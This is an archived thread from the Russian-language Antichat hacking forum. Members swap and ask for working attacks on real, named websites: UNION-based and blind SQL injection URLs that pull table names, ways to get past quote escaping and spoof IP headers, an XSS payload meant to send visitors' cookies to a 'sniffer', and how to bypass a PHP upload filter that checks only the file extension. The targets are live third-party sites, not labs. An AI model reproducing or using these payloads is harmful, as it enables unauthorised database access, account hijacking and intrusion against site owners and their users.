ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
15.07.2009, 21:08
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
уже в какой раз возникает одна и та же проблема, а именно в подборе имени таблицы, если база не показывает сразу все названия, а использовать limit 1,1 слишком долго...подскажитекак сделать это побыстрее (для начала пусть в 5-ой версии), а также, как определить, включены мэджики или нет, надо ли переводить в хекс или нет, воти лин для примера:
http://www.brainnet.org.au/brainnet/publications/pubs_abstract.jsp?PubID=-1+union+select+1,2,table_NAME,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+FROM +INFORMATION_SCHEMA.tables
|
|
|
15.07.2009, 21:16
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Сообщение от jecka3000
уже в какой раз возникает одна и та же проблема, а именно в подборе имени таблицы, если база не показывает сразу все названия, а использовать limit 1,1 слишком долго...подскажитекак сделать это побыстрее (для начала пусть в 5-ой версии), а также, как определить, включены мэджики или нет, надо ли переводить в хекс или нет, воти лин для примера:
http://www.brainnet.org.au/brainnet/publications/pubs_abstract.jsp?PubID=-1+union+select+1,2,table_NAME,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+FROM +INFORMATION_SCHEMA.tables
http://www.brainnet.org.au./brainnet/publications/pubs_abstract.jsp?PubID=-1+union+select+1,2,group_concat(table_name),4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27+from+information_schema.tables+group+by+ table_schema+limit+0,1
как определить, включены мэджики или нет,
http://www.brainnet.org.au./brainnet/publications/pubs_abstract.jsp?PubID=-1+union+select+1,2,'test',4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27
если есть слово test то off если ошибка то on
|
|
|
|
16.07.2009, 06:00
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Сообщение от mailbrush
.:[melkiy]:., попробуй файлик залить на хост, а потом грузить на форум удаленно, не со своего компа. У меня была такая ситуация.
Byrger, дальше после NOT IN свою колонку вставляешь. Почитай статьи о MsSQL инъекциях.
Ты видимо не прочёл что выше было...
У меня ковычка экранируется...
|
|
|
|
16.07.2009, 11:32
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Код:
http://www.board.kr.ua/wap/adv.php?id=34+order+by+4
Как эту расскрутить?
Ты видимо не прочёл что выше было...
У меня ковычка экранируется...
Хекс, чар... |
|
|
|
16.07.2009, 11:59
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
mailbrush:
Код:
http://www.board.kr.ua/wap/adv.php?id=34+and+substring(version(),1,1)=4--+
|
|
|
|
16.07.2009, 12:11
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Да о слепой я и без этого знаю, но вывода бы хотелось  |
|
|
|
16.07.2009, 12:16
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
INSERT INTO vote_result (ip, name, vote_id, answer) VALUES ('94.0.0.0', 'guest', '1', '0\\\'')
Выходит такая ошибка.
Както можно обойти экраниковку ковычки по другому?
Пробовал ')--+ ')/* ')%23 ')# '){
Также пробовал менянь ' на %27
попробовал так сделать %2527)--
INSERT INTO vote_result (ip, name, vote_id, answer) VALUES ('94.0.0.0', 'guest', '1', '0%27)-- ')
Может ещё можно в Ип адрес инекцию сделать? Как передать браузеру другой ИП?
|
|
|
|
16.07.2009, 12:42
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
2 mailbrush: дык вроде нету
2 Byrger:
А смотря как этот IP определяется, если пишется х-форвадер, то можно, если реальный - то фиг. В общем вероятность очень мала, забей на IP
|
|
|
|
16.07.2009, 15:00
|
|
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
Провел на форуме:
4761503
Репутация:
229
|
|
http://torg.mail.ru/337/res/?p3[price_from]=&p3[price_to]=&p3[delivery_id]=&p3[vendor_id][]="> XSS
Собственно подставил ссылку на сниффер но не работает (точнее отчета лога нету) 
Попробуйте ща потестить на своем сниффере... если все норм то дайте ваш запрос чтобы куки просылались (я потом изменю на свой сниффер) |
|
|
|
16.07.2009, 16:18
|
|
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
Провел на форуме:
4761503
Репутация:
229
|
|
PHP код:
<?php
if (isset($_POST['Upload'])) {
$target_path = "uploads/";
$target_path = $target_path . basename($_FILES['uploaded']['name']);
$uploaded_name = $_FILES['uploaded']['name'];
$uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
$uploaded_size = $_FILES['uploaded']['size'];
if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" || $uploaded_ext == "JPEG") && ($uploaded_size < 100000)){
if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
echo '<pre>Your image was not uploaded.</pre>';
} else {
echo '<pre>' . $uploaded_name . ' succesfully uploaded! </pre>';
}
}
else{
echo '<pre>Your image was not uploaded.</pre>';
}
}
?>
И еще....
Как это можно обойти?
Последний раз редактировалось wolmer; 16.07.2009 в 16:29..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
